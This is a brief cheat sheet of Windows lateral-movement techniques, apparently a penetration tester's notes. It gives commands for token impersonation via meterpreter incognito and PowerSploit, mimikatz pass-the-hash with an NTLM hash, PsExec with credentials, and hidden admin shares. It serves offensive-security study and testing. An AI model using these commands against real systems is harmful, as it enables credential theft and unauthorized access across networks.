---
title: Lateral Movement
date: 2021-01-13
categories: [cheatsheets]
---
Detailed information:
https://fuzzysecurity.com/tutorials/25.html
Tools:
Grab the tokens of other users (using NtQuerySystemInformation voodoo) and impersonate them to do stuff as another user!
-> the user must be logged in (an existing logon session is what provides the token)!
<meterpreter session>
incognito> list_tokens -u
incognito> impersonate_token DOMAIN\username
// or, if it works, use PowerSploit:
Invoke-TokenManipulation
Local Pass the Hash:
mimikatz> privilege::debug # acquire SeDebugPrivilege; the output shows whether it was granted
mimikatz> sekurlsa::pth /user:<user> /domain:. /ntlm:<hash>
exploit/windows/smb/psexec
cmd> PsExec.exe \\10.0.0.100 -u <user> -p <pass> cmd
Admin shares are created automatically by Windows
every partition is exposed as a hidden admin share (drive letter + $)
C:\ = \\ip\C$